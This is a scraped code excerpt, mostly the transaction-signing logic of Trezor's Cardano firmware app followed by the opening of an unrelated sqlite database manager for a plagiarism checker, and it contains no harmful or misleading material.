layout.warn_tx_output_no_datum()\n\n if output.asset_groups_count > 0:\n await layout.warn_tx_output_contains_tokens()\n\n if output.address_parameters is not None:\n address = addresses.derive_human_readable(\n self.keychain,\n output.address_parameters,\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n await self._show_output_credentials(output.address_parameters)\n else:\n assert output.address is not None # _validate_output\n address = output.address\n\n await layout.confirm_sending(\n output.amount,\n address,\n \"change\" if self._is_change_output(output) else \"address\",\n self.msg.network_id,\n chunkify=bool(self.msg.chunkify),\n )\n\n async def _show_output_credentials(\n self, address_parameters: messages.CardanoAddressParametersType\n ) -> None:\n await layout.show_change_output_credentials(\n Credential.payment_credential(address_parameters),\n Credential.stake_credential(address_parameters),\n )\n\n def _should_show_output(self, output: CardanoTxOutput) -> bool:\n \"\"\"\n Determines whether the output should be shown. 
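Simple change outputs\n        are shown only when details were requested and the output carries Plutus\n        data. 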
Extracted from _show_output\n because of readability.\n \"\"\"\n\n address_type = self._get_output_address_type(output)\n if (\n output.datum_hash is None\n and output.inline_datum_size == 0\n and address_type in addresses.ADDRESS_TYPES_PAYMENT_SCRIPT\n ):\n # Plutus script address without a datum is unspendable, we must show a warning.\n return True\n\n if self._is_simple_change_output(output):\n # Show change output only if showing details and if it contains plutus data\n has_plutus_data = (\n output.datum_hash is not None\n or output.inline_datum_size > 0\n or output.reference_script_size > 0\n )\n return self.should_show_details and has_plutus_data\n\n return True\n\n def _is_change_output(self, output: CardanoTxOutput) -> bool:\n \"\"\"Used only to determine what message to show to the user when confirming sending.\"\"\"\n return output.address_parameters is not None\n\n def _is_simple_change_output(self, output: CardanoTxOutput) -> bool:\n \"\"\"Used to determine whether an output is a change output with ordinary credentials.\"\"\"\n from ..helpers.credential import should_show_credentials\n\n return output.address_parameters is not None and not should_show_credentials(\n output.address_parameters\n )\n\n async def _process_legacy_output(\n self,\n output_list: HashBuilderList,\n output: CardanoTxOutput,\n should_show: bool,\n ) -> None:\n address = self._get_output_address(output)\n output_list.append(address)\n\n if output.asset_groups_count == 0:\n # Output structure is: [address, amount, datum_hash?]\n output_list.append(output.amount)\n else:\n # Output structure is: [address, [amount, asset_groups], datum_hash?]\n output_value_list: HashBuilderList = HashBuilderList(2)\n with output_list.append(output_value_list):\n await self._process_output_value(output_value_list, output, should_show)\n\n if output.datum_hash is not None:\n if should_show:\n await self._show_if_showing_details(\n layout.confirm_datum_hash(output.datum_hash)\n )\n output_list.append(output.datum_hash)\n\n async def _process_babbage_output(\n self,\n output_dict: HashBuilderDict[int, Any],\n output: CardanoTxOutput,\n should_show: bool,\n ) -> None:\n \"\"\"\n This output format corresponds to the post-Alonzo format in CDDL.\n Note that it is to be used also for outputs with no Plutus elements.\n \"\"\"\n from ..helpers.hash_builder_collection import HashBuilderEmbeddedCBOR\n\n add = output_dict.add # local_cache_attribute\n\n address = self._get_output_address(output)\n add(_BABBAGE_OUTPUT_KEY_ADDRESS, address)\n\n if output.asset_groups_count == 0:\n # Only amount is added to the dict.\n add(_BABBAGE_OUTPUT_KEY_AMOUNT, output.amount)\n else:\n # [amount, asset_groups] is added to the dict.\n output_value_list: HashBuilderList = HashBuilderList(2)\n with add(_BABBAGE_OUTPUT_KEY_AMOUNT, output_value_list):\n await self._process_output_value(output_value_list, output, should_show)\n\n if output.datum_hash is not None:\n if should_show:\n await self._show_if_showing_details(\n layout.confirm_datum_hash(output.datum_hash)\n )\n add(\n _BABBAGE_OUTPUT_KEY_DATUM_OPTION,\n (_DATUM_OPTION_KEY_HASH, output.datum_hash),\n )\n elif output.inline_datum_size > 0:\n inline_datum_list: HashBuilderList = HashBuilderList(2)\n with add(_BABBAGE_OUTPUT_KEY_DATUM_OPTION, inline_datum_list):\n inline_datum_list.append(_DATUM_OPTION_KEY_INLINE)\n inline_datum_cbor: HashBuilderEmbeddedCBOR = HashBuilderEmbeddedCBOR(\n output.inline_datum_size\n )\n with inline_datum_list.append(inline_datum_cbor):\n await 
self._process_inline_datum(\n inline_datum_cbor, output.inline_datum_size, should_show\n )\n\n if output.reference_script_size > 0:\n reference_script_cbor: HashBuilderEmbeddedCBOR = HashBuilderEmbeddedCBOR(\n output.reference_script_size\n )\n with add(_BABBAGE_OUTPUT_KEY_REFERENCE_SCRIPT, reference_script_cbor):\n await self._process_reference_script(\n reference_script_cbor, output.reference_script_size, should_show\n )\n\n async def _process_output_value(\n self,\n output_value_list: HashBuilderList,\n output: CardanoTxOutput,\n should_show_tokens: bool,\n ) -> None:\n \"\"\"Should be used only when the output contains tokens.\"\"\"\n assert output.asset_groups_count > 0\n\n output_value_list.append(output.amount)\n\n asset_groups_dict: HashBuilderDict[\n bytes, HashBuilderDict[bytes, int]\n ] = HashBuilderDict(\n output.asset_groups_count,\n ProcessError(\"Invalid token bundle in output\"),\n )\n with output_value_list.append(asset_groups_dict):\n await self._process_asset_groups(\n asset_groups_dict,\n output.asset_groups_count,\n should_show_tokens,\n )\n\n # asset groups\n\n async def _process_asset_groups(\n self,\n asset_groups_dict: HashBuilderDict[bytes, HashBuilderDict[bytes, int]],\n asset_groups_count: int,\n should_show_tokens: bool,\n ) -> None:\n for _ in range(asset_groups_count):\n asset_group: messages.CardanoAssetGroup = await ctx_call(\n CardanoTxItemAck(), messages.CardanoAssetGroup\n )\n self._validate_asset_group(asset_group)\n\n tokens: HashBuilderDict[bytes, int] = HashBuilderDict(\n asset_group.tokens_count,\n ProcessError(\"Invalid token bundle in output\"),\n )\n with asset_groups_dict.add(asset_group.policy_id, tokens):\n await self._process_tokens(\n tokens,\n asset_group.policy_id,\n asset_group.tokens_count,\n should_show_tokens,\n )\n\n def _validate_asset_group(\n self, asset_group: messages.CardanoAssetGroup, is_mint: bool = False\n ) -> None:\n INVALID_TOKEN_BUNDLE = (\n ProcessError(\"Invalid mint token bundle\")\n if is_mint\n else ProcessError(\"Invalid token bundle in output\")\n )\n\n if len(asset_group.policy_id) != _MINTING_POLICY_ID_LENGTH:\n raise INVALID_TOKEN_BUNDLE\n if asset_group.tokens_count == 0:\n raise INVALID_TOKEN_BUNDLE\n\n # tokens\n\n async def _process_tokens(\n self,\n tokens_dict: HashBuilderDict[bytes, int],\n policy_id: bytes,\n tokens_count: int,\n should_show_tokens: bool,\n ) -> None:\n for _ in range(tokens_count):\n token: messages.CardanoToken = await ctx_call(\n CardanoTxItemAck(), messages.CardanoToken\n )\n self._validate_token(token)\n if should_show_tokens:\n await layout.confirm_sending_token(policy_id, token)\n\n assert token.amount is not None # _validate_token\n tokens_dict.add(token.asset_name_bytes, token.amount)\n\n def _validate_token(\n self, token: messages.CardanoToken, is_mint: bool = False\n ) -> None:\n INVALID_TOKEN_BUNDLE = (\n ProcessError(\"Invalid mint token bundle\")\n if is_mint\n else ProcessError(\"Invalid token bundle in output\")\n )\n\n if is_mint:\n if token.mint_amount is None or token.amount is not None:\n raise INVALID_TOKEN_BUNDLE\n else:\n if token.amount is None or token.mint_amount is not None:\n raise INVALID_TOKEN_BUNDLE\n\n if len(token.asset_name_bytes) > _MAX_ASSET_NAME_LENGTH:\n raise INVALID_TOKEN_BUNDLE\n\n # inline datum\n\n async def _process_inline_datum(\n self,\n inline_datum_cbor: HashBuilderEmbeddedCBOR,\n inline_datum_size: int,\n should_show: bool,\n ) -> None:\n assert inline_datum_size > 0\n\n chunks_count = self._get_chunks_count(inline_datum_size)\n for 
chunk_number in range(chunks_count):\n chunk: messages.CardanoTxInlineDatumChunk = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxInlineDatumChunk\n )\n self._validate_chunk(\n chunk.data,\n chunk_number,\n chunks_count,\n ProcessError(\"Invalid inline datum chunk\"),\n )\n if chunk_number == 0 and should_show:\n await self._show_if_showing_details(\n layout.confirm_inline_datum(chunk.data, inline_datum_size)\n )\n inline_datum_cbor.add(chunk.data)\n\n # reference script\n\n async def _process_reference_script(\n self,\n reference_script_cbor: HashBuilderEmbeddedCBOR,\n reference_script_size: int,\n should_show: bool,\n ) -> None:\n assert reference_script_size > 0\n\n chunks_count = self._get_chunks_count(reference_script_size)\n for chunk_number in range(chunks_count):\n chunk: messages.CardanoTxReferenceScriptChunk = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxReferenceScriptChunk\n )\n self._validate_chunk(\n chunk.data,\n chunk_number,\n chunks_count,\n ProcessError(\"Invalid reference script chunk\"),\n )\n if chunk_number == 0 and should_show:\n await self._show_if_showing_details(\n layout.confirm_reference_script(chunk.data, reference_script_size)\n )\n reference_script_cbor.add(chunk.data)\n\n # certificates\n\n async def _process_certificates(self, certificates_list: HashBuilderList) -> None:\n for _ in range(self.msg.certificates_count):\n certificate: messages.CardanoTxCertificate = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxCertificate\n )\n self._validate_certificate(certificate)\n await self._show_certificate(certificate)\n\n if certificate.type == CardanoCertificateType.STAKE_POOL_REGISTRATION:\n pool_parameters = certificate.pool_parameters\n assert pool_parameters is not None # _validate_certificate\n\n pool_items_list: HashBuilderList = HashBuilderList(\n _POOL_REGISTRATION_CERTIFICATE_ITEMS_COUNT\n )\n with certificates_list.append(pool_items_list):\n for item in certificates.cborize_pool_registration_init(\n certificate\n ):\n pool_items_list.append(item)\n\n pool_owners_list: HashBuilderList[bytes] = HashBuilderList(\n pool_parameters.owners_count\n )\n with pool_items_list.append(pool_owners_list):\n await self._process_pool_owners(\n pool_owners_list, pool_parameters.owners_count\n )\n\n relays_list: HashBuilderList[cbor.CborSequence] = HashBuilderList(\n pool_parameters.relays_count\n )\n with pool_items_list.append(relays_list):\n await self._process_pool_relays(\n relays_list, pool_parameters.relays_count\n )\n\n pool_items_list.append(\n certificates.cborize_pool_metadata(pool_parameters.metadata)\n )\n else:\n certificates_list.append(\n certificates.cborize(self.keychain, certificate)\n )\n\n def _validate_certificate(self, certificate: messages.CardanoTxCertificate) -> None:\n certificates.validate(\n certificate,\n self.msg.protocol_magic,\n self.msg.network_id,\n self.account_path_checker,\n )\n\n async def _show_certificate(\n self, certificate: messages.CardanoTxCertificate\n ) -> None:\n from ..helpers.paths import CERTIFICATE_PATH_NAME\n\n if certificate.path:\n await self._fail_or_warn_if_invalid_path(\n SCHEMA_STAKING, certificate.path, CERTIFICATE_PATH_NAME\n )\n\n if certificate.type == CardanoCertificateType.STAKE_POOL_REGISTRATION:\n assert certificate.pool_parameters is not None\n await layout.confirm_stake_pool_parameters(\n certificate.pool_parameters, self.msg.network_id\n )\n await layout.confirm_stake_pool_metadata(\n certificate.pool_parameters.metadata\n )\n else:\n await 
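# Shape note (illustrative only): the nested structure streamed for a stake
# pool registration certificate in _process_certificates above. The exact field
# order and contents come from certificates.cborize_pool_registration_init and
# the ledger CDDL, not from this sketch:
# pool_items_list = [
#     <init items from cborize_pool_registration_init>,  # type tag, pool parameters...
#     [owner_key_hash, ...],                             # pool_owners_list
#     [relay, ...],                                      # relays_list
#     <metadata or null>,                                # cborize_pool_metadata(...)
# ]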
layout.confirm_certificate(certificate)\n\n # pool owners\n\n async def _process_pool_owners(\n self, pool_owners_list: HashBuilderList[bytes], owners_count: int\n ) -> None:\n owners_as_path_count = 0\n for _ in range(owners_count):\n owner: messages.CardanoPoolOwner = await ctx_call(\n CardanoTxItemAck(), messages.CardanoPoolOwner\n )\n certificates.validate_pool_owner(owner, self.account_path_checker)\n await self._show_pool_owner(owner)\n pool_owners_list.append(\n certificates.cborize_pool_owner(self.keychain, owner)\n )\n\n if owner.staking_key_path:\n owners_as_path_count += 1\n self.pool_owner_path = owner.staking_key_path\n\n certificates.assert_cond(owners_as_path_count == 1)\n\n async def _show_pool_owner(self, owner: messages.CardanoPoolOwner) -> None:\n from ..helpers.paths import POOL_OWNER_STAKING_PATH_NAME\n\n if owner.staking_key_path:\n await self._fail_or_warn_if_invalid_path(\n SCHEMA_STAKING, owner.staking_key_path, POOL_OWNER_STAKING_PATH_NAME\n )\n\n await layout.confirm_stake_pool_owner(\n self.keychain, owner, self.msg.protocol_magic, self.msg.network_id\n )\n\n # pool relays\n\n async def _process_pool_relays(\n self,\n relays_list: HashBuilderList[cbor.CborSequence],\n relays_count: int,\n ) -> None:\n for _ in range(relays_count):\n relay: messages.CardanoPoolRelayParameters = await ctx_call(\n CardanoTxItemAck(), messages.CardanoPoolRelayParameters\n )\n certificates.validate_pool_relay(relay)\n relays_list.append(certificates.cborize_pool_relay(relay))\n\n # withdrawals\n\n async def _process_withdrawals(\n self, withdrawals_dict: HashBuilderDict[bytes, int]\n ) -> None:\n for _ in range(self.msg.withdrawals_count):\n withdrawal: messages.CardanoTxWithdrawal = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxWithdrawal\n )\n self._validate_withdrawal(withdrawal)\n address_bytes = self._derive_withdrawal_address_bytes(withdrawal)\n await self._show_if_showing_details(\n layout.confirm_withdrawal(\n withdrawal, address_bytes, self.msg.network_id\n )\n )\n withdrawals_dict.add(address_bytes, withdrawal.amount)\n\n def _validate_withdrawal(self, withdrawal: messages.CardanoTxWithdrawal) -> None:\n from ..helpers.utils import validate_stake_credential\n\n validate_stake_credential(\n withdrawal.path,\n withdrawal.script_hash,\n withdrawal.key_hash,\n ProcessError(\"Invalid withdrawal\"),\n )\n\n if not 0 <= withdrawal.amount < LOVELACE_MAX_SUPPLY:\n raise ProcessError(\"Invalid withdrawal\")\n\n self.account_path_checker.add_withdrawal(withdrawal)\n\n # auxiliary data\n\n async def _process_auxiliary_data(self) -> None:\n from .. 
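# Condensed (hypothetical) restatement of the withdrawal checks above, assuming
# validate_stake_credential enforces exactly one credential source among
# path / script_hash / key_hash:
def _withdrawal_looks_valid(path, script_hash, key_hash, amount, lovelace_max_supply):
    one_credential = sum(1 for c in (path, script_hash, key_hash) if c) == 1
    return one_credential and 0 <= amount < lovelace_max_supply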
import auxiliary_data\n\n msg = self.msg # local_cache_attribute\n\n data: messages.CardanoTxAuxiliaryData = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxAuxiliaryData\n )\n auxiliary_data.validate(data, msg.protocol_magic, msg.network_id)\n\n (\n auxiliary_data_hash,\n auxiliary_data_supplement,\n ) = auxiliary_data.get_hash_and_supplement(\n self.keychain, data, msg.protocol_magic, msg.network_id\n )\n await auxiliary_data.show(\n self.keychain,\n auxiliary_data_hash,\n data.cvote_registration_parameters,\n msg.protocol_magic,\n msg.network_id,\n self.should_show_details,\n )\n self.tx_dict.add(_TX_BODY_KEY_AUXILIARY_DATA, auxiliary_data_hash)\n\n await ctx_call(auxiliary_data_supplement, messages.CardanoTxHostAck)\n\n # minting\n\n async def _process_minting(\n self, minting_dict: HashBuilderDict[bytes, HashBuilderDict]\n ) -> None:\n token_minting: messages.CardanoTxMint = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxMint\n )\n\n await layout.warn_tx_contains_mint()\n\n for _ in range(token_minting.asset_groups_count):\n asset_group: messages.CardanoAssetGroup = await ctx_call(\n CardanoTxItemAck(), messages.CardanoAssetGroup\n )\n self._validate_asset_group(asset_group, is_mint=True)\n\n tokens: HashBuilderDict[bytes, int] = HashBuilderDict(\n asset_group.tokens_count, ProcessError(\"Invalid mint token bundle\")\n )\n with minting_dict.add(asset_group.policy_id, tokens):\n await self._process_minting_tokens(\n tokens,\n asset_group.policy_id,\n asset_group.tokens_count,\n )\n\n # minting tokens\n\n async def _process_minting_tokens(\n self,\n tokens: HashBuilderDict[bytes, int],\n policy_id: bytes,\n tokens_count: int,\n ) -> None:\n for _ in range(tokens_count):\n token: messages.CardanoToken = await ctx_call(\n CardanoTxItemAck(), messages.CardanoToken\n )\n self._validate_token(token, is_mint=True)\n await layout.confirm_token_minting(policy_id, token)\n\n assert token.mint_amount is not None # _validate_token\n tokens.add(token.asset_name_bytes, token.mint_amount)\n\n # script data hash\n\n async def _process_script_data_hash(self) -> None:\n assert self.msg.script_data_hash is not None\n self._validate_script_data_hash()\n await self._show_if_showing_details(\n layout.confirm_script_data_hash(self.msg.script_data_hash)\n )\n self.tx_dict.add(_TX_BODY_KEY_SCRIPT_DATA_HASH, self.msg.script_data_hash)\n\n def _validate_script_data_hash(self) -> None:\n from ..helpers import SCRIPT_DATA_HASH_SIZE\n\n assert self.msg.script_data_hash is not None\n if len(self.msg.script_data_hash) != SCRIPT_DATA_HASH_SIZE:\n raise ProcessError(\"Invalid script data hash\")\n\n # collateral inputs\n\n async def _process_collateral_inputs(\n self, collateral_inputs_list: HashBuilderList[tuple[bytes, int]]\n ) -> None:\n for _ in range(self.msg.collateral_inputs_count):\n collateral_input: messages.CardanoTxCollateralInput = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxCollateralInput\n )\n self._validate_collateral_input(collateral_input)\n await self._show_collateral_input(collateral_input)\n collateral_inputs_list.append(\n (collateral_input.prev_hash, collateral_input.prev_index)\n )\n\n def _validate_collateral_input(\n self, collateral_input: messages.CardanoTxCollateralInput\n ) -> None:\n if len(collateral_input.prev_hash) != INPUT_PREV_HASH_SIZE:\n raise ProcessError(\"Invalid collateral input\")\n\n async def _show_collateral_input(\n self, collateral_input: messages.CardanoTxCollateralInput\n ) -> None:\n if self.msg.total_collateral is None:\n await 
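# Shape note (illustrative): the mint field streamed above nests
# policy_id -> asset_name -> amount, just like the output token bundle, except
# that minting uses `mint_amount`, which per the Cardano ledger rules may be
# negative to burn tokens. Placeholder data only:
mint_example = {b"<policy id>": {b"<asset name>": -5}}  # burning 5 units of one asset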
self._show_if_showing_details(\n layout.confirm_collateral_input(collateral_input)\n )\n\n # required signers\n\n async def _process_required_signers(\n self, required_signers_list: HashBuilderList[bytes]\n ) -> None:\n from ..helpers.utils import get_public_key_hash\n\n for _ in range(self.msg.required_signers_count):\n required_signer: messages.CardanoTxRequiredSigner = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxRequiredSigner\n )\n self._validate_required_signer(required_signer)\n await self._show_if_showing_details(\n layout.confirm_required_signer(required_signer)\n )\n\n key_hash = required_signer.key_hash or get_public_key_hash(\n self.keychain, required_signer.key_path\n )\n required_signers_list.append(key_hash)\n\n def _validate_required_signer(\n self, required_signer: messages.CardanoTxRequiredSigner\n ) -> None:\n from ..helpers import ADDRESS_KEY_HASH_SIZE\n\n key_path = required_signer.key_path # local_cache_attribute\n\n INVALID_REQUIRED_SIGNER = ProcessError(\"Invalid required signer\")\n\n if required_signer.key_hash and key_path:\n raise INVALID_REQUIRED_SIGNER\n\n if required_signer.key_hash:\n if len(required_signer.key_hash) != ADDRESS_KEY_HASH_SIZE:\n raise INVALID_REQUIRED_SIGNER\n elif key_path:\n if not (\n seed.is_shelley_path(key_path)\n or seed.is_multisig_path(key_path)\n or seed.is_minting_path(key_path)\n ):\n raise INVALID_REQUIRED_SIGNER\n else:\n raise INVALID_REQUIRED_SIGNER\n\n # collateral return\n\n async def _process_collateral_return(self) -> None:\n output: CardanoTxOutput = await ctx_call(CardanoTxItemAck(), CardanoTxOutput)\n self._validate_collateral_return(output)\n should_show_init = self._should_show_collateral_return_init(output)\n should_show_tokens = self._should_show_collateral_return_tokens(output)\n if should_show_init:\n await self._show_collateral_return_init(output)\n\n # Datums and reference scripts are forbidden, see _validate_collateral_return.\n output_items_count = 2\n if output.format == CardanoTxOutputSerializationFormat.ARRAY_LEGACY:\n output_list: HashBuilderList = HashBuilderList(output_items_count)\n with self.tx_dict.add(_TX_BODY_KEY_COLLATERAL_RETURN, output_list):\n await self._process_legacy_output(\n output_list, output, should_show_tokens\n )\n elif output.format == CardanoTxOutputSerializationFormat.MAP_BABBAGE:\n output_dict: HashBuilderDict[int, Any] = HashBuilderDict(\n output_items_count, ProcessError(\"Invalid collateral return\")\n )\n with self.tx_dict.add(_TX_BODY_KEY_COLLATERAL_RETURN, output_dict):\n await self._process_babbage_output(\n output_dict, output, should_show_tokens\n )\n else:\n raise RuntimeError # should be unreachable\n\n def _validate_collateral_return(self, output: CardanoTxOutput) -> None:\n self._validate_output(output)\n\n address_type = self._get_output_address_type(output)\n if address_type not in addresses.ADDRESS_TYPES_PAYMENT_KEY:\n raise ProcessError(\"Invalid collateral return\")\n\n if (\n output.datum_hash is not None\n or output.inline_datum_size > 0\n or output.reference_script_size > 0\n ):\n raise ProcessError(\"Invalid collateral return\")\n\n async def _show_collateral_return_init(self, output: CardanoTxOutput) -> None:\n # We don't display missing datum warning since datums are forbidden.\n\n if output.asset_groups_count > 0:\n await layout.warn_tx_output_contains_tokens(is_collateral_return=True)\n\n if output.address_parameters is not None:\n address = addresses.derive_human_readable(\n self.keychain,\n output.address_parameters,\n 
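# Condensed (hypothetical) restatement of _validate_required_signer above:
# exactly one of key_hash / key_path may be present; a hash must be
# ADDRESS_KEY_HASH_SIZE bytes (28 for Cardano's blake2b-224 key hashes), and a
# path must match a Shelley, multisig or minting schema (seed.is_*_path).
def _required_signer_ok(key_hash, key_path, hash_size=28):  # illustrative only
    if bool(key_hash) == bool(key_path):
        return False  # both or neither given -> invalid
    return len(key_hash) == hash_size if key_hash else True  # path schema check elided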
self.msg.protocol_magic,\n self.msg.network_id,\n )\n await self._show_output_credentials(\n output.address_parameters,\n )\n else:\n assert output.address is not None # _validate_output\n address = output.address\n\n await layout.confirm_sending(\n output.amount,\n address,\n \"collateral-return\",\n self.msg.network_id,\n chunkify=bool(self.msg.chunkify),\n )\n\n def _should_show_collateral_return_init(self, output: CardanoTxOutput) -> bool:\n if self.msg.total_collateral is None:\n return True\n\n if self._is_simple_change_output(output):\n return False\n\n return True\n\n def _should_show_collateral_return_tokens(self, output: CardanoTxOutput) -> bool:\n if self._is_simple_change_output(output):\n return False\n\n return self.should_show_details\n\n # reference inputs\n\n async def _process_reference_inputs(\n self, reference_inputs_list: HashBuilderList[tuple[bytes, int]]\n ) -> None:\n for _ in range(self.msg.reference_inputs_count):\n reference_input: messages.CardanoTxReferenceInput = await ctx_call(\n CardanoTxItemAck(), messages.CardanoTxReferenceInput\n )\n self._validate_reference_input(reference_input)\n await self._show_if_showing_details(\n layout.confirm_reference_input(reference_input)\n )\n reference_inputs_list.append(\n (reference_input.prev_hash, reference_input.prev_index)\n )\n\n def _validate_reference_input(\n self, reference_input: messages.CardanoTxReferenceInput\n ) -> None:\n if len(reference_input.prev_hash) != INPUT_PREV_HASH_SIZE:\n raise ProcessError(\"Invalid reference input\")\n\n # witness requests\n\n async def _process_witness_requests(self, tx_hash: bytes) -> CardanoTxResponseType:\n response: CardanoTxResponseType = CardanoTxItemAck()\n\n for _ in range(self.msg.witness_requests_count):\n witness_request = await ctx_call(response, messages.CardanoTxWitnessRequest)\n self._validate_witness_request(witness_request)\n path = witness_request.path\n await self._show_witness_request(path)\n if seed.is_byron_path(path):\n response = self._get_byron_witness(path, tx_hash)\n else:\n response = self._get_shelley_witness(path, tx_hash)\n\n return response\n\n def _validate_witness_request(\n self, witness_request: messages.CardanoTxWitnessRequest\n ) -> None:\n self.account_path_checker.add_witness_request(witness_request)\n\n async def _show_witness_request(\n self,\n witness_path: list[int],\n ) -> None:\n await layout.confirm_witness_request(witness_path)\n\n # helpers\n\n def _assert_tx_init_cond(self, condition: bool) -> None:\n if not condition:\n raise ProcessError(\"Invalid tx signing request\")\n\n def _is_network_id_verifiable(self) -> bool:\n \"\"\"\n Checks whether there is at least one element that contains information about\n network ID, otherwise Trezor cannot guarantee that the tx is actually meant for\n the given network.\n\n Note: Shelley addresses contain network id. 
The intended network of Byron\n addresses can be determined based on whether they contain the protocol magic.\n These checks are performed during address validation.\n \"\"\"\n return (\n self.msg.include_network_id\n or self.msg.outputs_count != 0\n or self.msg.withdrawals_count != 0\n )\n\n def _get_output_address(self, output: CardanoTxOutput) -> bytes:\n if output.address_parameters:\n return addresses.derive_bytes(\n self.keychain,\n output.address_parameters,\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n else:\n assert output.address is not None # _validate_output\n return addresses.get_bytes_unsafe(output.address)\n\n def _get_output_address_type(self, output: CardanoTxOutput) -> CardanoAddressType:\n if output.address_parameters:\n return output.address_parameters.address_type\n assert output.address is not None # _validate_output\n return addresses.get_type(addresses.get_bytes_unsafe(output.address))\n\n def _derive_withdrawal_address_bytes(\n self, withdrawal: messages.CardanoTxWithdrawal\n ) -> bytes:\n from trezor.enums import CardanoAddressType\n\n reward_address_type = (\n CardanoAddressType.REWARD\n if withdrawal.path or withdrawal.key_hash\n else CardanoAddressType.REWARD_SCRIPT\n )\n return addresses.derive_bytes(\n self.keychain,\n messages.CardanoAddressParametersType(\n address_type=reward_address_type,\n address_n_staking=withdrawal.path,\n staking_key_hash=withdrawal.key_hash,\n script_staking_hash=withdrawal.script_hash,\n ),\n self.msg.protocol_magic,\n self.msg.network_id,\n )\n\n def _get_chunks_count(self, data_size: int) -> int:\n assert data_size > 0\n return (data_size - 1) // _MAX_CHUNK_SIZE + 1\n\n def _validate_chunk(\n self,\n chunk_data: bytes,\n chunk_number: int,\n chunks_count: int,\n error: ProcessError,\n ) -> None:\n if chunk_number < chunks_count - 1 and len(chunk_data) != _MAX_CHUNK_SIZE:\n raise error\n if chunk_number == chunks_count - 1 and len(chunk_data) > _MAX_CHUNK_SIZE:\n raise error\n\n def _get_byron_witness(\n self, path: list[int], tx_hash: bytes\n ) -> messages.CardanoTxWitnessResponse:\n node = self.keychain.derive(path)\n return messages.CardanoTxWitnessResponse(\n type=CardanoTxWitnessType.BYRON_WITNESS,\n pub_key=derive_public_key(self.keychain, path),\n signature=self._sign_tx_hash(tx_hash, path),\n chain_code=node.chain_code(),\n )\n\n def _get_shelley_witness(\n self, path: list[int], tx_hash: bytes\n ) -> messages.CardanoTxWitnessResponse:\n return messages.CardanoTxWitnessResponse(\n type=CardanoTxWitnessType.SHELLEY_WITNESS,\n pub_key=derive_public_key(self.keychain, path),\n signature=self._sign_tx_hash(tx_hash, path),\n )\n\n def _sign_tx_hash(self, tx_body_hash: bytes, path: list[int]) -> bytes:\n from trezor.crypto.curve import ed25519\n\n node = self.keychain.derive(path)\n return ed25519.sign_ext(\n node.private_key(), node.private_key_ext(), tx_body_hash\n )\n\n async def _fail_or_warn_if_invalid_path(\n self, schema: PathSchema, path: list[int], path_name: str\n ) -> None:\n if not schema.match(path):\n await self._fail_or_warn_path(path, path_name)\n\n async def _fail_or_warn_path(self, path: list[int], path_name: str) -> None:\n if safety_checks.is_strict():\n raise DataError(f\"Invalid {path_name.lower()}\")\n else:\n await layout.warn_path(path, path_name)\n\n def _fail_if_strict_and_unusual(\n self, address_parameters: messages.CardanoAddressParametersType\n ) -> None:\n from ..helpers.paths import (\n CHANGE_OUTPUT_PATH_NAME,\n CHANGE_OUTPUT_STAKING_PATH_NAME,\n )\n\n if not 
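# Note (illustrative): both witness builders below sign the same tx body hash
# with extended Ed25519 (_sign_tx_hash); structurally, a Byron witness just
# carries the node's chain code in addition. Shown as plain tuples with
# placeholder data, not the actual protobuf messages:
byron_witness   = ("BYRON_WITNESS",   b"<pub key>", b"<signature>", b"<chain code>")
shelley_witness = ("SHELLEY_WITNESS", b"<pub key>", b"<signature>")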
safety_checks.is_strict():\n return\n\n if Credential.payment_credential(address_parameters).is_unusual_path:\n raise DataError(f\"Invalid {CHANGE_OUTPUT_PATH_NAME.lower()}\")\n\n if Credential.stake_credential(address_parameters).is_unusual_path:\n raise DataError(f\"Invalid {CHANGE_OUTPUT_STAKING_PATH_NAME.lower()}\")\n\n async def _show_if_showing_details(self, layout_fn: Awaitable) -> None:\n if self.should_show_details:\n await layout_fn\n","repo_name":"trezor/trezor-firmware","sub_path":"core/src/apps/cardano/sign_tx/signer.py","file_name":"signer.py","file_ext":"py","file_size_in_byte":47776,"program_lang":"python","lang":"en","doc_type":"code","stars":1147,"dataset":"github-code","pt":"40"} +{"seq_id":"9872841550","text":"'''author = Jarred De Beer, Yaseen Hamdulay & Merishka Lalla\nDate: 22/9/2014\nA database class to manage all insertions into different tables. These tables being Students, Assignments, Signatures\nand Matches. Each table has a series of different values but linked together through a Primary Key which is linked through\nan ID and a foreign key which is linked through other relevant column values.\n\nDatabase used was sqlite3.\n'''\n\n#__author__ = 'Merishka Lalla'\nimport os\nimport sqlite3\nimport time\nfrom model.signature import Signature\nfrom model.match import Match\nfrom model.assignment import Assignment\nfrom model.submissions import Submission\nfrom model.signaturematch import SignatureMatch\nfrom model.student import Student\nfrom signaturemanager import SignatureManager\nimport os.path\n\nclass DatabaseManager:\n conn = None\n\n '''A initiator method to allow the database to connect to the class for further database handling.'''\n\n def __init__(self, database_file='cheaters.db'):\n self.conn = sqlite3.connect(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', database_file))\n self.conn.text_factory = str\n '''The initialise database method connects a cursor and reads a sql script. The script is read and executed.\n Once executed, tables with relevant columns is created and initiated. There after the cursor is closed and the\n changes are committed.'''\n self.initialise_database()\n self.initialise_signature_manager()\n\n\n '''initialise_database runs the schema.sql script to generate database for later use in terms of data population and\n data manipulation.'''\n\n def initialise_database(self):\n c = self.conn.cursor()\n file = open(os.path.dirname(os.path.realpath(__file__))+'/schema.sql','r')\n c.executescript(file.read())\n c.close()\n self.conn.commit()\n\n '''initialise_signatures initializes the signatures which have been generated. These signatures are stored in an array\n after being looped through.'''\n\n def initialise_signature_manager(self):\n self.signature_manager = SignatureManager()\n c = self.conn.cursor()\n c.execute('SELECT NgramHash, SubmissionId, LineNumber FROM Signatures')\n result = []\n for row in c:\n self.signature_manager.store_signature(Signature(*row), row[1])\n c.close()\n\n\n '''Store_signatures stores the signatures which have been generated. These signatures show the aspects of code which\n are suspected to be copied or cheated. 
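# Illustrative sketch (not the project's SignatureManager): fingerprints like
# the (NgramHash, SubmissionId, LineNumber) rows loaded above are commonly
# produced by hashing sliding n-grams of normalized source lines:
def ngram_hashes(lines, n=4):  # hypothetical helper, for illustration only
    stripped = [ln.strip() for ln in lines if ln.strip()]
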